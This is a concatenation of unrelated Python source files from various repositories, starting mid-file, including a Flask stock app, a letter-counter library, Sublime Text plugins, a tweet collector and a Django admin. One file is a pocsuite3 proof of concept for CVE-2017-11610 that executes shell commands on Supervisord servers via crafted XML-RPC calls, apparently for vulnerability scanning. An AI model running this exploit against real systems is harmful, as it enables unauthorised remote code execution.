time.sleep(2)
a.say('print_test', board)
time.sleep(2)
a.say('print', board)
time.sleep(2)
a.say('print_test', board)
time.sleep(2)
print(board.messages)
def test_listeners():
# OPTIMIZE: a reacts to hearing her own voice - that's not necessary.
board = MSGBoard('board')
a = create_basic_entity()
b = create_basic_entity()
b.listen(board)
a.listen(board)
a.say('print_test', board)
print(board.messages)
time.sleep(2)
a.say('print', board)
time.sleep(2)
a.say('print_test', board)
time.sleep(2)
a.say('print', board)
time.sleep(2)
a.say('print_test', board)
time.sleep(2)
print(board.messages)
def test_listeners_multiple_boards():
board = MSGBoard('board')
requests = MSGBoard('request')
a = create_basic_entity()
b = create_basic_entity()
a.listen(board)
b.listen(board)
a.listen(requests)
b.listen(requests)
a.say('print_test', board)
print(board.messages)
time.sleep(2)
a.say('print', requests)
time.sleep(2)
a.say('print_test', requests)
time.sleep(2)
a.say('print', board)
time.sleep(2)
a.say('print_test', board)
time.sleep(2)
print(board.messages)
print(requests.messages)
#test_listen()
#test_listeners()
test_listeners_multiple_boards()
| 1,904 |
fpipe/meta/modified.py
|
vkvam/fpipe
| 18 |
2022980
|
import datetime
from fpipe.meta.abstract import FileData
class Modified(FileData[datetime.datetime]):
pass
| 114 |
src/stockapp.py
|
adjeiv/stocks-app
| 0 |
2022720
|
import os
import requests
from flask import Flask, render_template, request
from flask_sqlalchemy import SQLAlchemy
import pandas as pd
from stock_graph import create_plot
from bokeh.embed import components
import itertools
from news import get_news
API_KEY = ""
symbol_list = list(pd.read_csv("symbols.csv", names=["sym"])["sym"])
project_dir = os.path.dirname(os.path.abspath(__file__))
database_file = "sqlite:///{}".format(os.path.join(project_dir, "stocks.db"))
app = Flask(__name__)
app.config["SQLALCHEMY_DATABASE_URI"] = database_file
db = SQLAlchemy(app)
class Company(db.Model):
__tablename__ = "STOCKS"
country = db.Column(db.String(255), nullable=False)
currency = db.Column(db.String(255), nullable=False)
exchange = db.Column(db.String(255), nullable=False)
ipo = db.Column(db.Integer, nullable=False)
marketCapitalization = db.Column(db.Integer, nullable=False)
name = db.Column(db.String(255), nullable=False)
phone = db.Column(db.Integer, nullable=True)
shareOutstanding = db.Column(db.Integer, nullable=True)
ticker = db.Column(db.String(255), nullable=False, primary_key=True)
weburl = db.Column(db.String(255), nullable=False)
logo = db.Column(db.String(255), nullable=False)
finnhubIndustry = db.Column(db.String(255), nullable=False)
def __repr__(self):
return "<Company name: {}>".format(self.name)
companies = Company.query.all()
news_list = get_news(companies)
@app.route("/", methods=["GET", "POST"])
def home():
companies = Company.query.all()
if request.form:
symbol = request.form.get("symbol").upper()
##now check for validity
if symbol in symbol_list and symbol not in [sym.ticker for sym in companies]:
r = requests.get("https://finnhub.io/api/v1/stock/profile2?symbol=" + symbol + "&token=" + API_KEY)
company = Company(**(r.json()))
db.session.add(company)
db.session.commit()
companies = Company.query.all()
graphs = [create_plot(c.ticker) for c in companies]
graphs = [components(g) for g in graphs]
scrpts = [g[0] for g in graphs]
graphs = [g[1] for g in graphs]
#can send bool flag
return render_template("home.html", companies=companies, graphs=graphs, scrpts=scrpts, news_articles=news_list, num_companies=len(companies), num_news = len(news_list))
if __name__ == "__main__":
app.run(debug=True)
| 2,430 |
lettercounter/__init__.py
|
flexo/LetterCounter
| 0 |
2023125
|
"""LetterCounter: Represent Base 26 as letters of the alphabet
Released under the MIT license:
Copyright (c) <NAME>, 2006, 2007, 2010
Permission is hereby granted, free of charge, to any person obtaining a copy
of this software and associated documentation files (the "Software"), to deal
in the Software without restriction, including without limitation the rights
to use, copy, modify, merge, publish, distribute, sublicense, and/or sell
copies of the Software, and to permit persons to whom the Software is
furnished to do so, subject to the following conditions:
The above copyright notice and this permission notice shall be included in
all copies or substantial portions of the Software.
THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR
IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY,
FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE
AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER
LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM,
OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN
THE SOFTWARE.
"""
ASCII_UPPERCASE = 'ABCDEFGHIJKLMNOPQRSTUVWXYZ'
class LetterIterator(object):
"""Iterates over letters A -> Z, AA -> AZ, BA -> BZ, etc."""
def __init__(self, start='A', end=None, step=1, letters=ASCII_UPPERCASE):
self.started = False
self.current = start
self.end = None
if end:
self.end = end
self.step = step
self.letters = letters
def __iter__(self):
return self
def cycle_character(self, c):
try:
if c == self.letters[-1]:
return self.letters[0]
return self.letters[self.letters.index(c)+1]
except ValueError as e:
raise ValueError(str(e) + ": %c is not in %s" % (c, self.letters))
def _next(self):
# Edge cases:
if self.current == self.end:
raise StopIteration
# Normal behaviour:
for i in range(1, len(self.current)+2):
if i <= len(self.current):
self.current = self.current[:len(self.current)-i] \
+ self.cycle_character(self.current[-i]) \
+ self.current[len(self.current)-i+1:]
if self.current[-i] != self.letters[0]:
# letter was not rolled back to A; we're done.
break
else:
# We've rolled back all the letters, need another column.
self.current = self.letters[0] + self.current
return self.current
def __next__(self):
# First iteration should return first number regardless of step
if not self.started:
self.started = True
return self.current
for i in range(self.step):
next_ = self._next()
return next_
next = __next__
def __cmp__(self, other):
"""Compare to another LetterIterator and return which is higher
according to LetterIterator logic.
The two LetterIterators must use the same letters string.
"""
assert self.letters == other.letters
if len(self.current) > len(other.current):
return 1
elif len(self.current) < len(other.current):
return -1
else:
for pos in range(len(self.current)):
index_self = self.letters.index(self.current[pos])
index_other = other.letters.index(other.current[pos])
if index_self > index_other:
return 1
elif index_self < index_other:
return -1
else:
continue
else:
return 0
class LetterCounter(object):
"""Letter Counter: Represent positive integers as letters
A=0, B, C, ... Z, BA, BB, BC, ...
A is used as a 0, so AAAAAB is the same as B. For more common usage,
use LetterIterator.
"""
letters = ASCII_UPPERCASE
base = 26
def __init__(self, initial=""):
self.value = initial
def __repr__(self):
return 'LetterCounter("'+self.unpad()+'")'
def __str__(self):
return self.value
def __cmp__(self, other):
# match lengths of self.value and other.value
val1 = self.pad(max(len(self.value), len(other.value)))
val2 = val2.pad(max(len(self.value), len(other.value)))
if val1 < val2:
return -1
if val1 == val2:
return 0
if val1 > val2:
return 1
def __bool__(self):
for c in self.value:
if c != 'A':
return True
return False
__nonzero__ = __bool__
def __setattr__(self, name, value):
if name == "value":
object.__setattr__(self, name, value.upper())
def __getattr__(self, name):
if name == "value":
return self.unpad()
def __add__(self, other):
return LetterCounter(self.from_int(int(self) + int(other)))
def __sub__(self, other):
return LetterCounter(self.from_int(int(self) - int(other)))
def __mul__(self, other):
return LetterCounter(self.from_int(int(self) * int(other)))
def __div__(self, other):
return LetterCounter(self.from_int(int(self) / int(other)))
def __mod__(self, other):
return LetterCounter(self.from_int(int(self) % int(other)))
def __pow__(self, other):
return LetterCounter(self.from_int(pow(int(self), int(other))))
def __int__(self):
ret = 0
for v in reversed(range(len(self.value))):
pos = len(self.value) - 1 - v
ret += ( ord(self.value[pos]) - ord('A') ) * self.base**v
return int(ret) # don't return Long if possible
def from_int(cls, value):
"""Returns a string representing the integer provided.
The string can be used to create a new LetterCounter or LetterIterator.
"""
if value < 0:
raise ValueError("value must be >= 0")
i = 7
s = ""
while i >= 0:
d = value//(cls.base**i)
if d > 25:
raise ValueError("value must be <= 208827064575")
s += cls.letters[d]
value = value - d*(cls.base**i)
i -= 1
return s
from_int = classmethod(from_int)
fromInt = from_int # backwards compat.
def pad(self, padding):
v = self.value
while len(v) < padding:
v = "A"+v
return v
def unpad(self):
v = self.value
while v.startswith('A'):
v = v[1:]
return v
| 6,862 |
migration/pocs/supervisord-2017-11610_3_rce.py
|
cocobear/fuxi
| 731 |
2023244
|
#!/usr/bin/env python
# coding: utf-8
import xmlrpc.client
from urllib.parse import urlparse
from pocsuite3.api import register_poc
from pocsuite3.api import Output, POCBase
from pocsuite3.api import POC_CATEGORY, VUL_TYPE
class TestPOC(POCBase):
vulID = ''
version = '1.0'
author = 'kcat'
vulDate = '2017-7-24'
createDate = '2020-2-20'
updateDate = '2020-2-20'
references = [
'https://github.com/vulhub/vulhub/tree/master/supervisor/CVE-2017-11610']
name = 'CVE-2017-11610 Supervisord 远程命令执行漏洞'
appPowerLink = ''
appName = 'Supervisord'
appVersion = '3.x'
vulType = VUL_TYPE.CODE_EXECUTION
category = POC_CATEGORY.EXPLOITS.REMOTE
desc = '''
The XML-RPC server in supervisor before 3.0.1, 3.1.x before 3.1.4, 3.2.x before 3.2.4, and 3.3.x before 3.3.3
allows remote authenticated users to execute arbitrary commands via a crafted XML-RPC request,
related to nested supervisord namespace lookups.
利用 https://github.com/vulhub/vulhub/tree/master/supervisor/CVE-2017-11610 中的'poc.py'来检测是否存在漏洞
'''
def _verify(self):
result = {}
pr = urlparse(self.url)
if pr.port:
ports = [pr.port]
else:
ports = [9001]
command = 'id'
for port in ports:
target = "{0}://{1}:{2}/RPC2".format(pr.scheme,
pr.hostname, str(port))
try:
with xmlrpc.client.ServerProxy(target) as proxy:
old = getattr(proxy, 'supervisor.readLog')(0, 0)
logfile = getattr(
proxy, 'supervisor.supervisord.options.logfile.strip')()
getattr(proxy, 'supervisor.supervisord.options.warnings.linecache.os.system')(
'{} | tee -a {}'.format(command, logfile))
result_ = getattr(proxy, 'supervisor.readLog')(0, 0)
msg = (result_[len(old):])
if 'uid' in msg:
result['VerifyInfo'] = {}
result['VerifyInfo']['URL'] = target
result['extra'] = {}
result['extra']['command'] = 'id'
result['extra']['evidence'] = msg
break
except:
pass
return self.parse_output(result)
def _attack(self):
return self._verify()
def parse_output(self, result):
output = Output(self)
if result:
output.success(result)
else:
output.fail('not vulnerability')
return output
register_poc(TestPOC)
| 2,664 |
setup.py
|
npirzkal/NIRCAM_Gsim
| 0 |
2023378
|
import os
from setuptools import setup, Extension, find_packages
# Utility function to read the README file.
# Used for the long_description. It's nice, because now 1) we have a top level
# README file and 2) it's easier to type in the README file than to put a raw
# string in below ...
def read(fname):
return open(os.path.join(os.path.dirname(__file__), fname)).read()
setup(
name='NIRCAM_Gsim',
version='1.58',
description='NIRCAM Grism simulator, includes J.D. Smith polyclip C code',
url='https://github.com/npirzkal/GRISM_NIRCAM',
author='<NAME>',
author_email='<EMAIL>',
package_dir = {
'NIRCAM_Gsim': 'NIRCAM_Gsim',
'NIRCAM_Gsim.polyclip': 'NIRCAM_Gsim/polyclip',
'NIRCAM_Gsim.observations': 'NIRCAM_Gsim/observations'},
packages=["NIRCAM_Gsim","NIRCAM_Gsim.polyclip","NIRCAM_Gsim.observations","NIRCAM_Gsim.disperse"],
ext_modules=[Extension('NIRCAM_Gsim.polyclip.polyclip_c', ['NIRCAM_Gsim/polyclip/polyclip_c.c'])],
install_requires=[
"tqdm > 4.0.0",
"grismconf >= 1.24"
],
)
| 1,052 |
locale/pot/api/utilities/_autosummary/pyvista-ParametricBohemianDome-1.py
|
tkoyama010/pyvista-doc-translations
| 4 |
2023542
|
# Create a ParametricBohemianDome mesh.
#
import pyvista
mesh = pyvista.ParametricBohemianDome()
mesh.plot(color='w', smooth_shading=True)
| 139 |
spkcspider/apps/spider/sitemaps.py
|
devkral/spkbspider
| 5 |
2023024
|
__all__ = ["sitemaps", "ComponentSitemap", "ContentSitemap", "HomeSitemap"]
from django.conf import settings
from django.contrib.sitemaps import GenericSitemap, Sitemap
from django.urls import reverse
class ComponentSitemap(GenericSitemap):
priority = 0.3
changefreq = "daily"
date_field = "modified"
if not settings.DEBUG:
protocol = "https"
def __init__(self):
from .models import UserComponent
self.queryset = UserComponent.objects.filter(
public=True
)
class ContentSitemap(GenericSitemap):
priority = 0.7
changefreq = "hourly"
date_field = "modified"
if not settings.DEBUG:
protocol = "https"
def __init__(self):
from .models import AssignedContent
self.queryset = AssignedContent.objects.filter(
usercomponent__public=True
).exclude(info__contains="_unlisted")
class HomeSitemap(Sitemap):
priority = 0.5
changefreq = 'daily'
if not settings.DEBUG:
protocol = "https"
def items(self):
return ['home']
def location(self, item):
return reverse(item)
sitemaps = {
'components': ComponentSitemap,
'contents': ContentSitemap,
'home': HomeSitemap
}
| 1,245 |
etl.py
|
keyanyang/udacity-data-engineering-capstone
| 0 |
2023055
|
import pandas as pd
import os
from dotenv import load_dotenv, find_dotenv
from src.utility import *
from src.data_model import *
# load environment variables
load_dotenv(find_dotenv())
DATABASE_URL = os.getenv("DB_URL")
def main():
"""
- Load data from different sources
- Process Spark Dataframes
- Build the database and tables
"""
spark = create_spark_session()
# read data
df_i94 = spark.read.parquet("./data/raw/sas_data")
df_airport = spark.read.csv("./data/raw/airport-codes_csv.csv", header=True, inferSchema=True)
df_demo = spark.read.csv("./data/raw/us-cities-demographics.csv", header=True, inferSchema=True, sep=';')
df_temp = spark.read.csv("./data/raw/GlobalLandTemperaturesByCity.csv", header=True, inferSchema=True)
# drop duplicates
df_i94 = df_i94.drop_duplicates(['cicid'])
df_airport = df_airport.drop_duplicates(['ident'])
df_demo = df_demo.drop_duplicates(['City', 'State', 'Race'])
df_temp = df_temp.drop_duplicates(['dt', 'City', 'Country'])
# drop missing
df_i94 = df_i94.dropna(how='all')
df_airport = df_airport.dropna(how='all')
df_demo = df_demo.dropna(how='all')
df_temp = df_temp.dropna(how='all')
# drop others
df_i94 = df_i94.drop('occup', 'entdepu','insnum')
df_temp = df_temp.dropna(subset=['AverageTemperature'])
i94port_name_code_dict = build_i94_port_dict('./data/raw/i94port.txt')
i94port_codes = [code for name, code in i94port_name_code_dict.items()]
# clean i94 df
df_i94 = df_i94.filter(df_i94.i94port.isin(i94port_codes))
# create tables
i94_fact = create_i94_fact(df_i94)
visa_dim = create_visa_dim(df_i94)
temperature_dim = create_temperature_dim(df_temp, i94port_name_code_dict)
airport_dim = create_airport_dim(df_airport, i94port_name_code_dict)
demo_dim = create_demographics_dim(df_demo, i94port_name_code_dict)
output_tables = {
"i94_fact": i94_fact,
"visa_dim": visa_dim,
"temperature_dim": temperature_dim,
"airport_dim": airport_dim,
"demo_dim": demo_dim
}
# save data into database
for name, table in output_tables.items():
save_table_to_database(table, name, DATABASE_URL)
print("ETL is completed.")
if __name__ == "__main__":
main()
| 2,323 |
proteinsolver/dashboard/target_selection.py
|
ostrokach/proteinsolver
| 27 |
2022810
|
import ipywidgets as widgets
from IPython.display import HTML, display
from ipywidgets import Layout
import proteinsolver
from proteinsolver.dashboard.state import global_state
def update_target_selection(target_selection_out):
html_string = (
'<p class="myheading">'
"2. (Optional) Specify target amino acids at specific positions "
"(or enter '-' to leave the position open for design)"
"</p>"
)
target_sequence_selection_widget = create_target_selection_widget()
target_selection_out.clear_output(wait=True)
with target_selection_out:
display(HTML(html_string))
display(target_sequence_selection_widget)
def create_target_selection_widget():
def update_target_sequence(change):
residue_idx = int(change["owner"].description.split(" ")[0])
global_state.target_sequence[residue_idx] = change["new"]
target_sequence_ta.value = "".join(global_state.target_sequence)
reference_sequence_ta = widgets.Textarea(
value="".join(global_state.reference_sequence),
placeholder="AAAAA...",
description="<em>Reference</em><br>sequence:",
disabled=True,
layout=widgets.Layout(width="auto"),
)
_ = reference_sequence_ta.add_class("mysequence")
target_sequence_ta = widgets.Textarea(
value="".join(global_state.target_sequence),
placeholder="AAAAA...",
description="<em>Target</em><br>sequence:",
disabled=True,
layout=widgets.Layout(width="auto"),
)
_ = target_sequence_ta.add_class("mysequence")
target_sequence_dropdowns = []
for i, (aa_ref, aa_target) in enumerate(
zip(global_state.reference_sequence, global_state.target_sequence)
):
dropdown = widgets.Dropdown(
options=["-"] + proteinsolver.utils.AMINO_ACIDS,
value=aa_target,
description=f"{i} ({aa_ref})",
# style={},
layout=widgets.Layout(width="120px"),
style={"font_family": "monospace", "font_weight": "bold"},
)
dropdown.observe(update_target_sequence, names="value")
_ = dropdown.add_class("mytext")
target_sequence_dropdowns.append(dropdown)
target_sequence_dropdowns_wg = widgets.HBox(
target_sequence_dropdowns, layout=widgets.Layout(width="100%", flex_flow="row wrap")
)
accordion = widgets.Accordion(
children=[target_sequence_dropdowns_wg], layout=Layout(margin="2px 0px 0px 90px")
)
accordion.set_title(0, "Target residue picker")
accordion.selected_index = None
target_sequence_selection_wg = widgets.VBox(
[widgets.VBox([reference_sequence_ta, target_sequence_ta]), accordion]
)
return target_sequence_selection_wg
| 2,794 |
sb/Data/Packages/Default/Paragraph.py
|
luc4spas/SISGE-ACONCHEGO
| 0 |
2023114
|
import sublime, sublimeplugin
import string
import textwrap
import re
import Comment
def previousLine(view, sr):
"""sr should be a Region covering the entire hard line"""
if sr.begin() == 0:
return None
else:
return view.fullLine(sr.begin() - 1)
def nextLine(view, sr):
"""sr should be a Region covering the entire hard line, including
the newline"""
if sr.end() == view.size():
return None
else:
return view.fullLine(sr.end())
separatingLinePattern = re.compile("^[\\t ]*\\n?$")
def isParagraphSeparatingLine(view, sr):
return separatingLinePattern.match(view.substr(sr)) != None
def hasPrefix(view, line, prefix):
if not prefix:
return True
lineStart = view.substr(sublime.Region(line.begin(),
line.begin() + len(prefix)))
return lineStart == prefix
def expandToParagraph(view, tp):
sr = view.fullLine(tp)
if isParagraphSeparatingLine(view, sr):
return sublime.Region(tp, tp)
requiredPrefix = None
# If the current line starts with a comment, only select lines that are also
# commented
(lineComments, blockComments) = Comment.buildCommentData(view, tp)
dataStart = Comment.advanceToFirstNonWhitespaceOnLine(view, sr.begin())
for c in lineComments:
(start, disableIndent) = c
commentRegion = sublime.Region(dataStart,
dataStart + len(start))
if view.substr(commentRegion) == start:
requiredPrefix = view.substr(sublime.Region(sr.begin(), commentRegion.end()))
break
print "requiring prefix", requiredPrefix
first = sr.begin()
prev = sr
while True:
prev = previousLine(view, prev)
if (prev == None or isParagraphSeparatingLine(view, prev) or
not hasPrefix(view, prev, requiredPrefix)):
break
else:
first = prev.begin()
last = sr.end()
next = sr
while True:
next = nextLine(view, next)
if (next == None or isParagraphSeparatingLine(view, next) or
not hasPrefix(view, next, requiredPrefix)):
break
else:
last = next.end()
return sublime.Region(first, last)
def allParagraphsIntersectingSelection(view, sr):
paragraphs = []
para = expandToParagraph(view, sr.begin())
if not para.empty():
paragraphs.append(para)
while True:
line = nextLine(view, para)
if line == None or line.begin() >= sr.end():
break;
if not isParagraphSeparatingLine(view, line):
para = expandToParagraph(view, line.begin())
paragraphs.append(para)
else:
para = line
return paragraphs
class ExpandSelectionToParagraphCommand(sublimeplugin.TextCommand):
def run(self, view, args):
regions = []
for s in view.sel():
regions.append(sublime.Region(
expandToParagraph(view, s.begin()).begin(),
expandToParagraph(view, s.end()).end()))
for r in regions:
view.sel().add(r)
class WrapLinesCommand(sublimeplugin.TextCommand):
linePrefixPattern = re.compile("^\W+")
def extractPrefix(self, view, sr):
lines = view.splitByNewlines(sr)
if len(lines) == 0:
return None
initialPrefixMatch = self.linePrefixPattern.match(view.substr(
lines[0]))
if not initialPrefixMatch:
return None
prefix = view.substr(sublime.Region(lines[0].begin(),
lines[0].begin() + initialPrefixMatch.end()))
for line in lines[1:]:
if view.substr(sublime.Region(line.begin(),
line.begin() + len(prefix))) != prefix:
return None
return prefix
def widthInSpaces(self, str, tabWidth):
sum = 0;
for c in str:
if c == '\t':
sum += tabWidth
else:
sum += 1
return sum
def run(self, view, args):
width = 70
if len(args) > 0:
# Width has been given as an argument
try:
width = int(args[0])
except ValueError:
pass
elif view.options().getString("rulers"):
# try and guess the wrap width from the ruler, if any
try:
width = int(view.options().getString("rulers"))
except ValueError:
pass
if width == 0:
width = 70
# Make sure tabs are handled as per the current buffer
tabWidth = 8
if view.options().getString("tabSize"):
try:
tabWidth = int(view.options().getString("tabSize"))
except ValueError:
pass
if tabWidth == 0:
tabWidth == 8
paragraphs = []
for s in view.sel():
paragraphs.extend(allParagraphsIntersectingSelection(view, s))
if len(paragraphs) > 0:
view.sel().clear()
for p in paragraphs:
view.sel().add(p)
# This isn't an ideal way to do it, as we loose the position of the
# cursor within the paragraph: hence why the paragraph is selected
# at the end.
for s in view.sel():
wrapper = textwrap.TextWrapper()
wrapper.expand_tabs = False
wrapper.width = width
prefix = self.extractPrefix(view, s)
if prefix:
wrapper.initial_indent = prefix
wrapper.subsequent_indent = prefix
wrapper.width -= self.widthInSpaces(prefix, tabWidth)
if wrapper.width < 0:
continue
txt = view.substr(s)
if prefix:
txt = txt.replace(prefix, u"")
txt = string.expandtabs(txt, tabWidth)
txt = wrapper.fill(txt) + u"\n"
view.replace(s, txt)
# It's unhelpful to have the entire paragraph selected, just leave the
# selection at the end
ends = [s.end() - 1 for s in view.sel()]
view.sel().clear()
for pt in ends:
view.sel().add(sublime.Region(pt))
| 5,181 |
humfrey/pingback/middleware.py
|
ox-it/humfrey
| 6 |
2023040
|
from django_hosts.reverse import reverse_full
class PingbackMiddleware(object):
def process_response(self, request, response):
response['X-Pingback'] = request.build_absolute_uri(reverse_full('data', 'pingback:xmlrpc'))
return response
| 242 |
settings.py
|
no-coin-no-life/bitmex-trader-bot
| 8 |
2023560
|
from dotenv import load_dotenv
import os
app_home = os.path.abspath(
os.path.join(os.path.dirname(os.path.abspath(__file__)), "./"))
env_path = os.path.join(app_home, ".env")
load_dotenv(dotenv_path=env_path)
| 215 |
src/test/testassembly.py
|
joelphillips/pypyramid
| 1 |
2023235
|
'''
Created on Aug 30, 2010
@author: joel
'''
import unittest
import numpy as np
from pypyr.mesh import buildcubemesh
from pypyr.utils import pyramidquadrature, squarequadrature, trianglequadrature, uniformcubepoints
from pypyr.elements import H1Elements, HcurlElements, HdivElements, L2Elements
from pypyr.assembly import SymmetricSystem, AsymmetricSystem
class TestSymmetric(unittest.TestCase):
def testSymmetry(self):
tag = "B1"
for k in range(1,3):
quadrule = pyramidquadrature(k+1)
for N in range(1,3):
for elements in [H1Elements(k), HcurlElements(k), HdivElements(k)]:
system = SymmetricSystem(elements, quadrule, lambda m: buildcubemesh(N, m, tag), [tag])
for deriv in [False, True]:
SM = system.systemMatrix(deriv)
g = lambda x: np.zeros((len(x),1))
S, SIBs, Gs = system.processBoundary(SM, {tag:g})
np.testing.assert_array_almost_equal(SM.todense(), SM.transpose().todense())
np.testing.assert_array_almost_equal(S.todense(), S.transpose().todense())
class TestAsymmetric(unittest.TestCase):
def testSymmetry(self):
tag = "B1"
for k in range(1,3):
quadrule = pyramidquadrature(k+1)
for N in range(1,3):
hdivelt1 = HdivElements(k)
l2elt1 = L2Elements(k)
hdivelt2 = HdivElements(k)
l2elt2 = L2Elements(k)
system = AsymmetricSystem(hdivelt1, l2elt1, quadrule, lambda m:buildcubemesh(N,m,tag), [], [])
systemt = AsymmetricSystem(l2elt2, hdivelt2, quadrule, lambda m:buildcubemesh(N,m,tag), [], [])
SM = system.systemMatrix(True, False)
StM = system.transpose().systemMatrix(False, True)
SMt = systemt.systemMatrix(False, True)
np.testing.assert_array_almost_equal(SM.todense(), SMt.transpose().todense())
np.testing.assert_array_almost_equal(StM.todense(), SMt.todense())
| 2,226 |
app/tweet_collection_v2/stream_listener.py
|
s2t2/tweet-analyzer-py
| 5 |
2022964
|
import os
from pprint import pprint
from time import sleep
from dotenv import load_dotenv
from tweepy.streaming import StreamListener
from tweepy import Stream
from urllib3.exceptions import ProtocolError
from app import seek_confirmation
from app.twitter_service import TwitterService
from app.bq_service import BigQueryService, generate_timestamp
from app.tweet_collection_v2.csv_storage import LocalStorageService
from app.tweet_collection_v2.tweet_parser import parse_status
load_dotenv()
STORAGE_ENV = os.getenv("STORAGE_ENV", default="local") # "local" OR "remote"
BATCH_SIZE = int(os.getenv("BATCH_SIZE", default="20"))
class TopicResetEvent(Exception):
pass
class TweetCollector(StreamListener):
def __init__(self, twitter_service=None, storage_env=STORAGE_ENV, bq_service=None, csv_service=None, batch_size=BATCH_SIZE):
self.twitter_service = twitter_service or TwitterService()
self.api = self.twitter_service.api
self.auth = self.api.auth
self.parse_status = parse_status
self.storage_env = storage_env
if self.storage_env == "local":
self.storage_service = csv_service or LocalStorageService()
elif self.storage_env == "remote":
self.storage_service = bq_service or BigQueryService()
else:
raise ValueError("Expecting the STORAGE_ENV to be 'local' or 'remote'. Please try again...")
self.batch_size = batch_size
self.batch = []
self.counter = 0
print("-------------------------------")
print("STREAM LISTENER...")
print(" STORAGE ENV:", self.storage_env.upper())
print(" STORAGE SERVICE:", type(self.storage_service))
print(" BATCH SIZE:", self.batch_size)
print("--------------------------------")
def set_topics(self):
self.topics = self.storage_service.fetch_topic_names()
print("SET TOPICS:", self.topics)
def reset_topics(self):
self.set_topics()
raise TopicResetEvent("Let's trigger the listener to re-start in a kind of hacky way :-D")
#
# LISTEN FOR TWEETS AND COLLECT THEM
#
def on_connect(self):
print("LISTENER IS CONNECTED!")
def on_status(self, status):
"""Param status (tweepy.models.Status)"""
if self.is_collectable(status):
self.counter +=1
print("----------------")
print(f"DETECTED AN INCOMING TWEET! ({self.counter} -- {status.id_str})")
self.collect_in_batches(status)
@staticmethod
def is_collectable(status):
"""Param status (tweepy.models.Status)"""
return (status.lang == "en"
#and status.user.verified
#and status.in_reply_to_status_id == None
#and status.in_reply_to_user_id == None
#and status.in_reply_to_screen_name == None
#and status.is_quote_status == False
#and status.retweeted == False
#and not hasattr(status, "retweeted_status")
)
def collect_in_batches(self, status):
"""
Param status (tweepy.models.Status)
Moving this logic out of on_status in hopes of preventing ProtocolErrors
Storing in batches to reduce API calls, and in hopes of preventing ProtocolErrors
"""
self.batch.append(self.parse_status(status))
if len(self.batch) >= self.batch_size:
self.store_and_clear_batch()
def store_and_clear_batch(self):
print("STORING BATCH OF", len(self.batch), "TWEETS...")
self.storage_service.append_tweets(self.batch)
print("CLEARING BATCH...")
self.batch = []
self.counter = 0
#
# HANDLE ERRORS
#
def on_exception(self, exception):
# has encountered errors:
# + urllib3.exceptions.ProtocolError: ('Connection broken: IncompleteRead(0 bytes read)'
# + urllib3.exceptions.ReadTimeoutError: HTTPSConnectionPool
print("EXCEPTION:", type(exception))
print(exception)
def on_error(self, status_code):
print("ERROR:", status_code)
def on_limit(self, track):
"""Param: track (int) starts low and subsequently increases"""
print("RATE LIMITING", track)
sleep_seconds = self.backoff_strategy(track)
print("SLEEPING FOR:", sleep_seconds, "SECONDS...")
sleep(sleep_seconds)
@staticmethod
def backoff_strategy(i):
"""
Param: i (int) increasing rate limit number from the twitter api
Returns: number of seconds to sleep for
"""
return (int(i) + 1) ** 2 # raise to the power of two
def on_timeout(self):
print("TIMEOUT!")
return True # don't kill the stream!
def on_warning(self, notice):
print("DISCONNECTION WARNING:", type(notice))
print(notice)
def on_disconnect(self, notice):
print("DISCONNECT:", type(notice))
if __name__ == "__main__":
listener = TweetCollector()
seek_confirmation()
listener.set_topics()
stream = Stream(listener.auth, listener)
print("STREAM", type(stream))
while True:
try:
stream.filter(track=listener.topics)
except ProtocolError:
print("--------------------------------")
print("RESTARTING AFTER PROTOCOL ERROR!")
continue
except TopicResetEvent as event:
print("--------------------------------")
print("RESTARTING AFTER TOPICS REFRESH!")
continue
# this never gets reached
| 5,598 |
customers/admin.py
|
klebercode/protocolle
| 0 |
2023610
|
# coding: utf-8
from django.contrib import admin, messages
from django.contrib.admin.helpers import ACTION_CHECKBOX_NAME
from django.template.response import TemplateResponse
from django.contrib.auth.models import User
from django.db import connection
from django.http import HttpResponseRedirect
from protocolle.core.models import Status, TipoInstituicao, Carater, Natureza
from models import Client
from forms import CreateAdminForm
def create_admin(self, request, queryset):
form = None
# u = User.objects.get(pk=request.user.pk)
if 'apply' in request.POST:
form = CreateAdminForm(request.POST)
if form.is_valid():
username = form.cleaned_data['username']
email = form.cleaned_data['email']
password = <PASSWORD>data['password']
for obj in queryset:
connection.set_schema(obj.schema_name, include_public=False)
user = User.objects.create_user(username, email, password)
user.is_staff = True
user.is_active = True
user.is_superuser = True
user.save()
# adicionando os status
s = {'Tramitando', 'Arquivado', 'Parado', 'Entregue'}
status_check = Status.objects.filter(nome__in=s)
if not status_check:
for i in s:
new_status = Status(nome=i)
new_status.save()
# adicionando os tipos de instituicao
ti = {'Externa', 'Interna'}
tipo_inst_check = TipoInstituicao.objects.filter(nome__in=ti)
if not tipo_inst_check:
for i in ti:
new_tipoinst = TipoInstituicao(nome=i)
new_tipoinst.save()
# adicionando os carateres
c = {'Normal', 'Urgente'}
carater_check = Carater.objects.filter(nome__in=c)
if not carater_check:
for i in c:
new_carater = Carater(nome=i)
new_carater.save()
# adicionando as naturezas
n = {'Aberto', 'Confidencial'}
natureza_check = Natureza.objects.filter(nome__in=c)
if not carater_check:
for i in n:
new_natureza = Natureza(nome=i)
new_natureza.save()
connection.set_schema_to_public()
messages.success(request, 'Admin "%s" para Cliente "%s": \
criado com sucesso.' % (username, obj.name))
return HttpResponseRedirect(request.get_full_path())
if not form:
form = CreateAdminForm(initial={'_selected_action':
request.POST.getlist(ACTION_CHECKBOX_NAME)})
# request=request)
opts = self.model._meta
app_label = opts.app_label
module_name = opts.module_name,
context = {
'title': "Criar Administrador",
'opts': opts,
'app_label': app_label,
'module_name': module_name,
'create_form': form,
}
return TemplateResponse(request, 'admin/create_admin.html',
context, current_app=self.admin_site.name)
create_admin.short_description = "Criar Administrador"
def drop_schema(self, request, queryset):
for obj in queryset:
if request.POST.get('post'):
cursor = connection.cursor()
cursor.execute('DROP SCHEMA %s CASCADE' % obj.schema_name)
obj.delete()
messages.success(request, 'Cliente "%s" e seus dados: removido \
com sucesso.' % obj.name)
else:
opts = self.model._meta
app_label = opts.app_label
module_name = opts.module_name,
context = {
'title': "Tem certeza que deseja continuar?",
'queryset': queryset,
